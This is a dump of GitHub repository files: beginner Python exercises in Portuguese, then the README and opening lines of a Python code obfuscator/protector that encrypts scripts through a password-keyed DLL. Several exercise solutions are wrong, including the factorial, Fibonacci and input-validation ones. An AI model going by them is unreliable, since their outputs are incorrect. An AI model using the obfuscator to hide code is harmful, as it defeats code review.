int(input(\"Digite um número: \"))\ncount1 = 0\ncount = 1\nwhile count1 < numero:\n fatorial = numero * (numero - count)\n count = count - 1\n count1 = count + 1\n\nprint(fatorial)" }, { "alpha_fraction": 0.668181836605072, "alphanum_fraction": 0.6727272868156433, "avg_line_length": 23.55555534362793, "blob_id": "6e21dbf5be150bacf82efa4dea77e681bc96620a", "content_id": "a25e8b44da642513d1d69a23cb981f3e27e8fe8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 89, "num_lines": 9, "path": "/Ex 007.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça um valor e mostre na tela se o valor é positivo ou negativo.\n\"\"\"\n\nvalor = float(input('Entre com um valor: '))\n\nif valor > 0:\n print('Valor é positivo')\nelse:\n print('Valor é negativo')" }, { "alpha_fraction": 0.6690140962600708, "alphanum_fraction": 0.7259389758110046, "avg_line_length": 39.5, "blob_id": "13c2ba6f0706aa99891db8e7d29ecfc21d112299", "content_id": "5f4133f68ef21e0dfab4555603c064437efab968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1725, "license_type": "no_license", "max_line_length": 314, "num_lines": 42, "path": "/EX 004.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada. Considere que a cobertura da tinta é de 1 litro para cada 6 metros quadrados e que a tinta é vendida em latas de 18 litros, que custam R$ 80,00 ou em galões de 3,6 litros, que custam R$ 25,00.\nInforme ao usuário as quantidades de tinta a serem compradas e os respectivos preços em 3 situações:\ncomprar apenas latas de 18 litros;\ncomprar apenas galões de 3,6 litros;\nmisturar latas e galões, de forma que o desperdício de tinta seja menor. Acrescente 10% de folga e sempre arredonde os valores para cima, isto é, considere latas cheias.\"\"\"\n\nimport math\n\nprint\n'Calculo para verificar quantas latas/galões de tintas serão necessarias e o valor delas'\n\nMETROS = int(input('Entre com a quantidade a ser pintada: '))\n\nMETROSLATAS = METROS / 6\nif (METROSLATAS <= 0):\n METROSLATAS = 1\n\nQTDLATAS18 = math.floor(METROSLATAS / 18 + (18 * 0.10))\nQTDGALOES36 = math.floor(METROSLATAS / 3.6 + (3.6 * 0.10))\nQTDLATAS = METROSLATAS / 18\nRESTO = METROSLATAS % 18\n\nif (RESTO > 0 and RESTO <= 3.6):\n QTDGALOES = 1\nelif (RESTO == 0):\n QTDGALOES = 0\nelse:\n QTDGALOES = math.floor(RESTO / 3.6 + (3.6 * 0.10))\n\nif (QTDLATAS18 <= 0 or QTDGALOES36 <= 0 or QTDGALOES < 0):\n QTDGALOES36 = 1\n QTDLATAS18 = 1\n QTDGALOES = 1\n\nPRECOLATAS18 = QTDLATAS18 * 80\nPRECOGALOES36 = QTDGALOES36 * 25\nPRECOLATAS = QTDLATAS * 80\nPRECOGALOES = QTDGALOES * 25\n\nPRECOTIMO = PRECOLATAS + PRECOGALOES\n\nprint('Quantidade de latas: ',QTDLATAS18,'PREÇO LATAS:', PRECOLATAS18, 'Quantidade galoes: ', QTDGALOES36,'PREÇO GALOES:',PRECOGALOES36,'Solução Otima, latas: e galões:',QTDLATAS, QTDGALOES, PRECOTIMO)\n\n\n\n" }, { "alpha_fraction": 0.6618497371673584, "alphanum_fraction": 0.6734104156494141, "avg_line_length": 33.70000076293945, "blob_id": "51427f026c527d353d3f13e88d6cb1ead2a5c69a", "content_id": "a8861a77b6bbd742a8856551b9abaf59f577c9f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 113, "num_lines": 10, "path": "/Ex 029.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça um numero e informe se ele é inteiro ou decimal. Utilize função de arredondamento\"\"\"\n\nnum = float(input('Digite um numero: '))\n\nif num == round(num):\n print('Número inteiro...')\nelse:\n print('Decimal ')\n print('Arredondando para baixo: ', round(num-0.5))\n print('Arredondando para cima: ', round(num+0.5))" }, { "alpha_fraction": 0.6199095249176025, "alphanum_fraction": 0.6357465982437134, "avg_line_length": 29.714284896850586, "blob_id": "3c39057182b8f5f890b0bbf820ca144db4e08ee3", "content_id": "5d64e2634de9eadc5d3f90f57fd9b9e782e68c67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 166, "num_lines": 14, "path": "/Ex 052.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça um número inteiro e determine se ele é ou não um número primo. Um número primo é aquele que é divisível somente por ele mesmo e por 1.\"\"\"\r\n\r\n\r\nnumero = int(input(\"Digite um numero: \"))\r\ndivisores = 0\r\nfor divisor in range(1, numero):\r\n if numero % divisor == 0:\r\n divisores = divisores + 1\r\n if divisores > 1:\r\n break\r\nif divisores > 1:\r\n print(\"não é primo\")\r\nelse:\r\n print(\"é primo\")" }, { "alpha_fraction": 0.6291497945785522, "alphanum_fraction": 0.6963562965393066, "avg_line_length": 38.80644989013672, "blob_id": "d9f3b4c34cee0fce07ea65285028837bbf1d3331", "content_id": "f59a3a4caa8f843fd33245a162cbf4b3ffca6fa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "no_license", "max_line_length": 360, "num_lines": 31, "path": "/Ex 026.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa para um caixa eletrônico. O programa deverá perguntar ao usuário a valor do saque e depois informar quantas notas de cada valor serão fornecidas. As notas disponíveis serão as de 1, 5, 10, 50 e 100 reais. O valor mínimo é de 10 reais e o máximo de 600 reais. O programa não deve se preocupar com a quantidade de notas existentes na máquina.\nExemplo 1: Para sacar a quantia de 256 reais, o programa fornece duas notas de 100, uma nota de 50, uma nota de 5 e uma nota de 1;\nExemplo 2: Para sacar a quantia de 399 reais, o programa fornece três notas de 100, uma nota de 50, quatro notas de 10, uma nota de 5 e quatro notas de 1.\"\"\"\n\n\nprint('Valor minimo para saque: 10, minímo: 600')\nnumero = int(input('Digite o valor do saque: '))\n\nwhile (numero < 10) or (numero > 600):\n print('Valor inválido')\n numero = int(input('Digite novamente: '))\n\ncem = int(numero / 100)\nnumero = numero % 100\n\ncinquenta = int(numero / 50)\nnumero = numero % 50\n\ndez = int(numero / 10)\nnumero = numero % 10\n\ncinco = int(numero / 5)\nnumero = numero % 5\n\num = numero\n\nprint('Notas R$100,00 = ', cem)\nprint('Notas R$ 50,00 = ', cinquenta)\nprint('Notas R$ 10,00 = ', dez)\nprint('Notas R$ 5,00 = ', cinco)\nprint('Notas R$ 1,00 = ', um)\n\n" }, { "alpha_fraction": 0.6108986735343933, "alphanum_fraction": 0.6434034705162048, "avg_line_length": 32.74193572998047, "blob_id": "374c35e2243b4c26e79bf536a1ed11072383d287", "content_id": "59c92a5650d6e497f1aa1e248dfdbfe906edc072", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1069, "license_type": "no_license", "max_line_length": 185, "num_lines": 31, "path": "/Ex 019.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que lê as duas notas parciais obtidas por um aluno numa disciplina ao longo de um semestre, e calcule a sua média. A atribuição de conceitos obedece à tabela abaixo:\n Média de Aproveitamento Conceito\n Entre 9.0 e 10.0 A\n Entre 7.5 e 9.0 B\n Entre 6.0 e 7.5 C\n Entre 4.0 e 6.0 D\n Entre 4.0 e zero E\nO algoritmo deve mostrar na tela as notas, a média, o conceito correspondente e a mensagem “APROVADO” se o conceito for A, B ou C ou “REPROVADO” se o conceito for D ou E.\"\"\"\n\nnota1=float(input(\"Digite nota 1: \"))\nnota2=float(input(\"Digite nota 2: \"))\n\nmedia=(nota1+nota2)/2\n\nif media >=9:\n conceito = \"A\"\nelif media >= 7.5:\n conceito = \"B\"\nelif media >= 6:\n conceito = \"C\"\nelif media >= 4:\n conceito = \"D\"\nelse: # Não é necessário utilizar o elif já que só resta uma opção\n conceito = \"E\"\n\nresultado = \"Aprovado!\"\n\nif media <= 4:\n resultado = \"Reprovado\"\n\nprint('Notas: ', nota1, nota2, 'Media: ', media, 'Conceito: ', conceito, 'Resultado:', resultado)\n" }, { "alpha_fraction": 0.6379310488700867, "alphanum_fraction": 0.6379310488700867, "avg_line_length": 13.75, "blob_id": "e799198139b5caa995642a9ee1370a0011287fd7", "content_id": "e31cdf0a5350d7c0634fafe5bc9060b00f476ca2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 23, "num_lines": 4, "path": "/Ex 027.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"teste git hub\"\"\"\n\ncambio = ('Alo cambio')\nprint(cambio)" }, { "alpha_fraction": 0.5861126184463501, "alphanum_fraction": 0.6123564839363098, "avg_line_length": 43.63414764404297, "blob_id": "1cef3b811da12b3039735ed51ab03f94cea381ac", "content_id": "9246f32e1d878a1e3ebd16e91f83c6f0641c4555", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1851, "license_type": "no_license", "max_line_length": 505, "num_lines": 41, "path": "/Ex 033.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"O Hipermercado Tabajara está com uma promoção de carnes que é imperdível. Confira:\n Até 5 Kg Acima de 5 Kg\nFile Duplo R$ 4,90 por Kg R$ 5,80 por Kg\nAlcatra R$ 5,90 por Kg R$ 6,80 por Kg\nPicanha R$ 6,90 por Kg R$ 7,80 por Kg\nPara atender a todos os clientes, cada cliente poderá levar apenas um dos tipos de carne da promoção, porém não há limites para a quantidade de carne por cliente. Se compra for feita no cartão Tabajara o cliente receberá ainda um desconto de 5% sobre o total da compra. Escreva um programa que peça o tipo e a quantidade de carne comprada pelo usuário e gere um cupom fiscal, contendo as informações da compra: tipo e quantidade de carne, preço total, tipo de pagamento, valor do desconto e valor a pagar.\n\"\"\"\n\ntp = input('Qual o tipo de carne deseja comprar: (a)->File duplo; (b)--> Alcatra, (c)-->Picanha')\nqt = float(input('Qual a quantidade de carne a ser comprada: '))\ntbj = input('Compra feita com cartao Tabajara? (s/n): ').lower()\n\np_total = 0\nv_desconto = 0\nv_a_pagar = 0\n\nif tp == 'a':\n if qt < 5:\n p_total = (qt * 4.90)\n else:\n p_total = (qt * 5.80)\nif tp == 'b':\n if qt < 5:\n p_total = (qt * 5.90)\n else:\n p_total = (qt * 6.80)\nif tp == 'c':\n if qt < 5:\n p_total = (qt * 6.90)\n else:\n p_total = (qt * 7.80)\n\nif tbj == 's':\n v_desconto = (p_total * 0.05)\nelse:\n p_total = p_total\n\nv_a_pagar = p_total - v_desconto\n\n#tipo e quantidade de carne, preço total, tipo de pagamento, valor do desconto e valor a pagar.\nprint('Cupom fiscal...','\\n', 'TIPO: ', tp.title(),'\\n', 'QUANTIDADE: ', qt,'\\n', 'PREÇO TOTAL: ', p_total,'\\n', 'TIPO DE PAGAMENTO: ', 'Cartão tabajara?', tbj,'\\n', 'VALOR DO DESCONTO: ', v_desconto,'\\n', 'VALOR A PAGAR: ', v_a_pagar)" }, { "alpha_fraction": 0.6117886304855347, "alphanum_fraction": 0.6483739614486694, "avg_line_length": 36.69230651855469, "blob_id": "e9e920e8b564d4a77a076c8c7c8bdadc6dda8de2", "content_id": "c438e9fabeb3a03bbaa583d1ecdfc90f32f5fd0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/Ex 011.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia três números e mostre o maior deles.\n\"\"\"\n\nnum_1 = float(input('Entre com o primeiro numero: '))\nnum_2 = float(input('Entre com o segundo numero: '))\nnum_3 = float(input('Entre com o terceiro numero: '))\n\nif num_1 > num_2 and num_1 > num_3:\n print('O primeiro numero é o maior', num_1)\nelif num_2 > num_1 and num_2 > num_3:\n print('O segundo numero e o maior ', num_2)\nelif num_3 > num_1 and num_3 > num_2:\n print('O terceiro numero é o maior.', num_3)\n\n\n" }, { "alpha_fraction": 0.6839826703071594, "alphanum_fraction": 0.6839826703071594, "avg_line_length": 37.41666793823242, "blob_id": "b8b7806beadb65af7b6e50b7cfad41f4a85927de", "content_id": "33d44c8db1898786a83dbcdbb20ff06a82cb6af3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 177, "num_lines": 12, "path": "/Ex 035.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que leia um nome de usuário e a sua senha e não aceite a senha igual ao nome do usuário, mostrando uma mensagem de erro e voltando a pedir as informações.\"\"\"\n\n\nnome = input('Entre com o nome: ')\nsenha = input('Entre com uma senha: ')\n\nwhile nome == senha:\n print('ERRO: o usuario nao pode ser igual a senha.')\n nome = input('Entre com o nome: ')\n senha = input('Entre com uma senha: ')\nelse:\n print('Cadastro feito com sucesso')\n\n" }, { "alpha_fraction": 0.582245409488678, "alphanum_fraction": 0.6057441234588623, "avg_line_length": 18.200000762939453, "blob_id": "f6ce40b8c8ab3d93b4c9e3985416dd48846c0048", "content_id": "5fb8945a54f1e7316d23fb6ccafe51e1f0f3bc00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 67, "num_lines": 20, "path": "/Ex 040.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que leia 5 números e informe o maior número.\"\"\"\n\n#com while\nmaior = -99\ni = 1\nwhile i <= 5:\n wnumero = int(input('Informe um numero: '))\n if wnumero > maior:\n maior = wnumero\n i += 1\nprint(maior)\n\n#com for\n\nmairo = -99\nfor i in range (5):\n fnumero = int(input('Informe um numero: '))\n if fnumero > mairo:\n mairo = fnumero\nprint(mairo)" }, { "alpha_fraction": 0.5061349868774414, "alphanum_fraction": 0.6104294657707214, "avg_line_length": 22.285715103149414, "blob_id": "6d0af1b2b25d08f38f07f39a71bfff15b1933a82", "content_id": "ebb2a0294d8758767eac75af9e57025ce0fd9964", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 148, "num_lines": 14, "path": "/Ex 048.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"A série de Fibonacci é formada pela seqüência 0,1,1,2,3,5,8,13,21,34,55,... Faça um programa que gere a série até que o valor seja maior que 500.\n\"\"\"\n\nlista = []\nu1 = 1\nu2 = 1\ncount = 0\nfor i in range (0, 13):\n count = u1 + u2\n u1 = count\n u2 = count - u2\n lista.append(count)\n #if count > 500:\nprint(lista)\n" }, { "alpha_fraction": 0.5552115440368652, "alphanum_fraction": 0.5706914067268372, "avg_line_length": 35.346153259277344, "blob_id": "001a1f5d47be22316bd6776f6000d4052a03735b", "content_id": "f2e02ef461de78e689433cb8d862de1899460ce8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 127, "num_lines": 26, "path": "/Ex 053.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Altere o programa de cálculo dos números primos, informando, caso o número não seja primo, por quais número ele é divisível.\r\n\"\"\"\r\n\r\n\r\nnum = int(input(\"Digite um numero: \"))\r\nlista = []\r\nif num < 2: # 0 e 1 não são primos, e vou desconsiderar os números negativos\r\n print('não é primo')\r\nelif num == 2: # 2 é o único número par que é primo\r\n print('primo')\r\nelif num % 2 == 0: # se for par e não é 2, não é primo\r\n print('não é primo')\r\n for i in range(1,num+1):\r\n if num % i == 0:\r\n lista.append(i)\r\n print(f'Os n° {num} é divisível por {lista}')\r\nelse: # aqui eu sei que o número é ímpar # só testo se é divisível por números ímpares\r\n for i in range(1, num + 1, 2):\r\n if num % i == 0:\r\n lista.append(i)\r\n print('não é primo')\r\n print(lista)\r\n break # não é primo, interrompe o for\r\n print(f'Os n° {num} é divisível por {lista}')\r\n else:\r\n print('é primo')" }, { "alpha_fraction": 0.6384891867637634, "alphanum_fraction": 0.6753597259521484, "avg_line_length": 40.22222137451172, "blob_id": "56d6c020e5cd346dcae49b952bfd6b60bf5d8b1c", "content_id": "52a98cb5380645ed2ebafd4acf5fad673c9f13e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1131, "license_type": "no_license", "max_line_length": 321, "num_lines": 27, "path": "/Ex 031.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Um posto está vendendo combustíveis com a seguinte tabela de descontos:\nÁlcool:\naté 20 litros, desconto de 3% por litro\nacima de 20 litros, desconto de 5% por litro\nGasolina:\naté 20 litros, desconto de 4% por litro\nacima de 20 litros, desconto de 6% por litro Escreva um algoritmo que leia o número de litros vendidos, o tipo de combustível (codificado da seguinte forma: A-álcool, G-gasolina), calcule e imprima o valor a ser pago pelo cliente sabendo-se que o preço do litro da gasolina é R$ 2,50 o preço do litro do álcool é R$ 1,90.\n\"\"\"\n\nl_vendidos = float(input('Quantos litros foram vendidos? : '))\ncomb = input('Qual é o tipo de combustível? (alcooll = a, gasolina = g): ').lower()\np_litros = 0\n\nif comb == 'a':\n p_litros = 1.90\n if l_vendidos <= 20:\n l_vendidos = l_vendidos - (l_vendidos*0.03)\n else:\n l_vendidos = l_vendidos - (l_vendidos*0.05)\nelse:\n p_litros = 2.50\n if l_vendidos <= 20:\n l_vendidos = l_vendidos - (l_vendidos*0.04)\n else:\n l_vendidos = l_vendidos - (l_vendidos*0.06)\npreço = l_vendidos*p_litros\nprint('Preço a pagar é: ', preço,\"R$\")" }, { "alpha_fraction": 0.8297872543334961, "alphanum_fraction": 0.8297872543334961, "avg_line_length": 22.5, "blob_id": "10ca3a4fe6507cdc3856dfb65d6137d61c8f0406", "content_id": "b5d7aaa35340ed3adae66de311f1d3b9133cfd50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/README.md", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "# Exercicios-py\nSolved WikipythonBR exercises.\n" }, { "alpha_fraction": 0.7016128897666931, "alphanum_fraction": 0.7145161032676697, "avg_line_length": 37.8125, "blob_id": "0c7aeceb190092a2324f96b27ac245cc81ec5f29", "content_id": "2fb2e1dc22223cdfd41b455ba4b52dff020cadfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 631, "license_type": "no_license", "max_line_length": 137, "num_lines": 16, "path": "/Ex 010.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa para a leitura de duas notas parciais de um aluno. O programa deve calcular a média alcançada por aluno e apresentar:\nA mensagem \"Aprovado\", se a média alcançada for maior ou igual a sete;\nA mensagem \"Reprovado\", se a média for menor do que sete;\nA mensagem \"Aprovado com Distinção\", se a média for igual a dez.\"\"\"\n\nparcial_1 = float(input('Entre com a primeira nota parcial: '))\nparcial_2 = float(input('Entre com a segunda nota parcial: '))\n\nmedia = (parcial_1 + parcial_2) / 2\n\nif media == 10:\n print('Aprovado com distinção')\nelif media >= 7:\n print('Aprovado')\nelse:\n print('Reprovado')" }, { "alpha_fraction": 0.560773491859436, "alphanum_fraction": 0.6298342347145081, "avg_line_length": 23.066667556762695, "blob_id": "c7071416b0ce77c996049781aa9afda196e7b0d9", "content_id": "6dc9bc44a7da7c0f1adfe2219922e36e42d299e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 137, "num_lines": 15, "path": "/Ex 047.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"A série de Fibonacci é formada pela seqüência 1,1,2,3,5,8,13,21,34,55,... Faça um programa capaz de gerar a série até o n−ésimo termo.\n\"\"\"\n\nn = int(input('Entre com um numero para a sequencia Fibonacci: '))\n\nlista = []\nu1 = 1\nu2 = 1\ncount = 0\nfor i in range (0, n):\n count = u1 + u2\n u1 = count\n u2 = count - u2\n lista.append(count)\nprint(lista)\n\n" }, { "alpha_fraction": 0.676982581615448, "alphanum_fraction": 0.6943907141685486, "avg_line_length": 21.478260040283203, "blob_id": "3c9de3500af04cd2f5504ad6c81dfbb5f9d0552f", "content_id": "eafb4f30811c93c3ec0eef4cd051a52da4b7bc55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 75, "num_lines": 23, "path": "/Ex 014.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia três números e mostre-os em ordem decrescente.\n\"\"\"\n\nn1 = float(input('Entre n1: '))\nn2 = float(input('Entre n2: '))\nn3 = float(input('Entre nc: '))\n\nlista = []\nlista.append(n1)\nlista.append(n2)\nlista.append(n3)\nlista_decrescente = sorted(lista, reverse=True)\nprint(lista_decrescente)\n\n#também funciona\n\nlista_com_for = []\nqnt = 3\nfor i in range(qnt):\n elemento = int(input('Digite um numero: '))\n lista_com_for.append(elemento)\nlista_com_for.sort(reverse=True)\nprint(lista_com_for)\n" }, { "alpha_fraction": 0.5675146579742432, "alphanum_fraction": 0.5988258123397827, "avg_line_length": 24.600000381469727, "blob_id": "3b8ccee5985c0795a6e5f54867e00cd2d2559de4", "content_id": "34c688bd575d4969470fb2e7ea3e10b19ab7d3bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 517, "license_type": "no_license", "max_line_length": 165, "num_lines": 20, "path": "/Ex 018.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia um número e exiba o dia correspondente da semana. (1-Domingo, 2- Segunda, etc.), se digitar outro valor deve aparecer valor inválido.\"\"\"\n\nnum = int(input('Qual o numero? '))\n\nif num == 1:\n print('1 = Domingo')\nelif num == 2:\n print('2 = Segunda')\nelif num == 3:\n print('3 = Terça')\nelif num == 4:\n print('4 = Quarta')\nelif num == 5:\n print('5 = Quinta')\nelif num == 6:\n print('6 = Sexta')\nelif num == 7:\n print('7 = Sábado')\nelse:\n print('Valor inválido...')" }, { "alpha_fraction": 0.673285186290741, "alphanum_fraction": 0.6895306706428528, "avg_line_length": 38.64285659790039, "blob_id": "20c8bf9296f70690fcb550759d1b3e2461b88d6a", "content_id": "9ca16e45ea84133df9b23f592112fe31c6d8f588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 172, "num_lines": 14, "path": "/Ex 051.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Altere o programa de cálculo do fatorial, permitindo ao usuário calcular o fatorial várias vezes e limitando o fatorial a números inteiros positivos e menores que 16.\"\"\"\n\nimport math\nlista = []\ncount = 0\n\nqnt = int(input('Digite a quantidade de numeros que deseja entrar: '))\nwhile qnt != count:\n numero = float(input(\"Digite um numero: \"))\n while numero // 1 != numero or numero < 0 or 0 or numero < 16:\n numero = float(input(\"Digite um número[erro]: \"))\n\n print(\"Fatorial do número digitado: \", math.factorial(numero))\n count += 1" }, { "alpha_fraction": 0.6728813648223877, "alphanum_fraction": 0.6813559532165527, "avg_line_length": 20.814815521240234, "blob_id": "77d66875a60529bbb4fb634cd51d12abb165c3a4", "content_id": "a9488602d66726bb8df1f3a0692682d03e1173bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 599, "license_type": "no_license", "max_line_length": 171, "num_lines": 27, "path": "/Ex 045.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça dois números, base e expoente, calcule e mostre o primeiro número elevado ao segundo número. Não utilize a função de potência da linguagem.\"\"\"\n\nprint(\"base ^ expoente:\")\nbase=int(input(\"Base: \"))\nexpoente=int(input(\"Expoente: \"))\n\npotencia=1\ncount=1\n\nwhile count <= expoente:\n potencia *= base\n count +=1\n\nprint(base,\"^\",expoente,\"=\",potencia)\n\n#for\nprint(\"base ^ expoente:\")\nbase=int(input(\"Base: \"))\nexpoente=int(input(\"Expoente: \"))\n\npotencia=1\n\nfor count in range(expoente):\n potencia *= base\n count += 1\n\nprint(base,\"^\",expoente,\"=\",potencia)\n\n" }, { "alpha_fraction": 0.5511904954910278, "alphanum_fraction": 0.6380952596664429, "avg_line_length": 39.0476188659668, "blob_id": "94a87fe720b261c3b639cba506a4caf1308f0737", "content_id": "a2885ec23342020078e2dae301f98173b8ae3077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 126, "num_lines": 21, "path": "/Ex 024.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia um número inteiro menor que 1000 e imprima a quantidade de centenas, dezenas e unidades do mesmo.\nObservando os termos no plural a colocação do \"e\", da vírgula entre outros. Exemplo:\n326 = 3 centenas, 2 dezenas e 6 unidades\n12 = 1 dezena e 2 unidades Testar com: 326, 300, 100, 320, 310,305, 301, 101, 311, 111, 25, 20, 10, 21, 11, 1, 7 e 16\"\"\"\n\nnum = (input('Numero: '))\nnum_str = str(num)\nqt_num = len(num_str)\n\nif qt_num == 3:\n centena = num_str[0:1]\n dezena = num_str[1:2]\n unidade = num_str[2:3]\n print(num_str, '=', 'centena', centena, 'dezena', dezena, 'unidades', unidade)\nif qt_num == 2:\n dezena = num_str[0:1]\n unidade = num_str[1:2]\n print(num_str, '=', 'dezena', dezena, 'unidades', unidade)\nif qt_num == 1:\n unidade = num_str[0:1]\n print(num_str, '=', 'unidade', unidade)" }, { "alpha_fraction": 0.6723602414131165, "alphanum_fraction": 0.6847826242446899, "avg_line_length": 48.53845977783203, "blob_id": "de8d5e5a60fec32012658a4354a95b23cc0f34c2", "content_id": "c08a12bc74e5b1863ce03b3bd68be660552dc74c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 653, "license_type": "no_license", "max_line_length": 159, "num_lines": 13, "path": "/Ex 038.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Altere o programa anterior permitindo ao usuário informar as populações e as taxas de crescimento iniciais. Valide a entrada e permita repetir a operação\"\"\"\n\ncidade_a = int(input('Entre com a população da primeira cidade: '))\ncidade_b = int(input('Entre com a população da segunda cidade: '))\nano = 0\ntx_a = float(input('Entre com a primeira taxa de crescimento (em %): '))\ntx_b = float(input('Entre com a segunda taxa de crescimento(em %): '))\n\nwhile cidade_a <= cidade_b:\n cidade_a += (cidade_a*tx_a)/100\n cidade_b += (cidade_b*tx_b)/100\n ano += 1\n print(f\"A pop da cidade a {cidade_a}, a pop cidade b {cidade_b} o ano {ano}\")\n" } ]
53
NADKennyTung/PythonObfuscated
https://github.com/NADKennyTung/PythonObfuscated
0f73271072dcf670341dccd5f315558070cfc4dc
95c99a684f169f70e4d0a0f8a0d610afd9be86ed
fd66208b79d93066d3c1483b9f2e865b2923c0dd
refs/heads/master
2023-08-22T07:33:46.958163
2021-09-24T04:02:59
2021-09-24T04:02:59
392,018,637
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7489986419677734, "alphanum_fraction": 0.7610146999359131, "avg_line_length": 73.9000015258789, "blob_id": "99e2760dee14cefb75cf9d4c3d7a3a2a177f2878", "content_id": "76c7cde9725d5687533f13f4c91cefb59cb4de81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 749, "license_type": "no_license", "max_line_length": 154, "num_lines": 10, "path": "/README.md", "repo_name": "NADKennyTung/PythonObfuscated", "src_encoding": "UTF-8", "text": "# FunnyProtector\nStrong Python Obfuscator & Protector\n\n- Removed pieces of needless code (website module, check user acc, print obfuscating process)\n- Removed obfuscate string that can generate error: string2replace = \"Cipher(\\\"\"+StringEncrypt(string.replace(\"\\\"\",\"\"))+\"\\\")\"\n- How to use this tool:\n+ Gen protector dll passwd: Open _protector.sln in folder, assign const wchar_t* good = 'string key' then build (x86 to gen protector32, x64 to protector)\n+ Set protector dll passwd in python script: assign result = mydll.Xoring(code,'string key')\n+ Run script: python funnyprotector.py then input your path to file\n+ # NOTE: _protector.dll and _protector32.dll depends on others dlls used to build them, so uninstall visual studio can raise errors\n" }, { "alpha_fraction": 0.6209367513656616, "alphanum_fraction": 0.6577937006950378, "avg_line_length": 38.867347717285156, "blob_id": "7f2340ff3362539c4033ee7d0afdf2538f4d42fe", "content_id": "3c85951f720a23c0bfaa85f4fcf45f21f2d11bf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3907, "license_type": "no_license", "max_line_length": 432, "num_lines": 98, "path": "/Protector/protector.py", "repo_name": "NADKennyTung/PythonObfuscated", "src_encoding": "UTF-8", "text": "import base64,sys,binascii,os,ctypes\nfrom ctypes import *\n\nkernel32 = ctypes.WinDLL('kernel32')\nuser32 = ctypes.WinDLL('user32')\nSW_MAXIMIZE = 